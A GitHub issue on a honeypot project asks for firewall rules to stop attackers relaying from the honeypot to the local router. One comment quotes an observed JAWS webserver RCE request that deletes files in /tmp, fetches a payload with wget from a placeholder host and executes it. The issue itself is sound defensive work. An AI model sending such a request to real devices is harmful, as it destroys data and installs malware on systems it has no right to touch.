Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Enhancement: firewall-rules (additional) setup #142

Open
jonix-jonixsson opened this issue Jan 17, 2020 · 1 comment
Open

Enhancement: firewall-rules (additional) setup #142

jonix-jonixsson opened this issue Jan 17, 2020 · 1 comment

Comments

@jonix-jonixsson
Copy link

Suggestion: when the honeypot is setup, add firewall rule(s) so an outside attacker cannot connect to the router via the honeypot, this ought to apply when the honeypot is located on a DMZ (where it has an address of (e.g.) 192.168.x.x (black-net IPs) ,nad the router has IP 192.168.x.1 (a usual address..)
There was someone of us who saw an ssh-attempt to connect from the honeypot to his/hers router/gateway-IP , and that kind of connection ought to be blocked with a firewall rule.
Can a installation question be made if the router will be located on a DMZ, or if it will be directly connected to (wild) internet ,and the result of the question will create and (eventual) rule?
It _is_possible that the ISP can use non-routeable IP-range for their customers and NAT that range (e.g. 10.x.x.x range)

It may be hypothetical, but possible to perform this kind of "relay" attack

@iot-operator
Copy link

I have not only saw SSH attempts towards my router from the honeypot, but already saw attempts to do exploitation of JAWS Webserver unauthenticated shell RCE via "GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s/jaws;sh+/tmp/jaws".
Hope this will be implemented soon.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

3 participants